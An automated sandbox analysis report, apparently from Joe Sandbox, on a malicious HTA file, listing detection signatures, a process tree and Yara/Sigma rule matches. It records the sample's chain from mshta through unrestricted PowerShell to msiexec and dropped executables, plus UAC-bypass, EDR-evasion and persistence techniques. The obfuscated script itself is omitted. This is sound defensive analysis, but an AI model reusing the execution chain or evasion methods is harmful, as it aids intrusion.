Windows
Analysis Report
es.hta
Overview
General Information
Detection
| Score | Range | Whitelisted | Confidence |
|---|---|---|---|
| 100 | 0 - 100 | false | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Checks for available system drives (often done to infect USB drives)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 6708 cmdline: mshta.exe "C:\Users\user\Desktop\es.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- powershell.exe (PID: 2676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted [obfuscated PowerShell script omitted] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 2688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- msiexec.exe (PID: 3192 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\ONHQNHFT.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
- msiexec.exe (PID: 6620 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
- IDRBackup.exe (PID: 480 cmdline: "C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe" MD5: 371C165E3E3C1A000051B78D7B0E7E79)
- IDRBackup.exe (PID: 3104 cmdline: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe MD5: 371C165E3E3C1A000051B78D7B0E7E79)
- cmd.exe (PID: 6156 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- comvalidate_ljv3.exe (PID: 3736 cmdline: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe MD5: 967F4470627F823F4D7981E511C9824F)
- IDRBackup.exe (PID: 1852 cmdline: "C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe" MD5: 371C165E3E3C1A000051B78D7B0E7E79)
- IDRBackup.exe (PID: 6176 cmdline: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe MD5: 371C165E3E3C1A000051B78D7B0E7E79)
- cmd.exe (PID: 6236 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 3796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- IDRBackup.exe (PID: 2472 cmdline: "C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe" MD5: 371C165E3E3C1A000051B78D7B0E7E79)
- IDRBackup.exe (PID: 5756 cmdline: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe MD5: 371C165E3E3C1A000051B78D7B0E7E79)
- cmd.exe (PID: 5948 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- msiexec.exe (PID: 6792 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\ONHQNHFT.msi" MD5: E5DA170027542E25EDE42FC54C929077)
- msiexec.exe (PID: 5684 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\ONHQNHFT.msi" MD5: E5DA170027542E25EDE42FC54C929077)
- svchost.exe (PID: 5184 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- IDRBackup.exe (PID: 4924 cmdline: "C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe" MD5: 371C165E3E3C1A000051B78D7B0E7E79)
- cmd.exe (PID: 4928 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- IDRBackup.exe (PID: 3524 cmdline: "C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe" MD5: 371C165E3E3C1A000051B78D7B0E7E79)
- cmd.exe (PID: 4828 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 4548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- IDRBackup.exe (PID: 5084 cmdline: "C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe" MD5: 371C165E3E3C1A000051B78D7B0E7E79)
- cmd.exe (PID: 4624 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 4812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | |
| | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | |
| | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | |
| | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | |
| | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | |
| | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | |
| | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen | |
| | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | |
| | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen | |
| | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | |
System Summary
Source: | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp):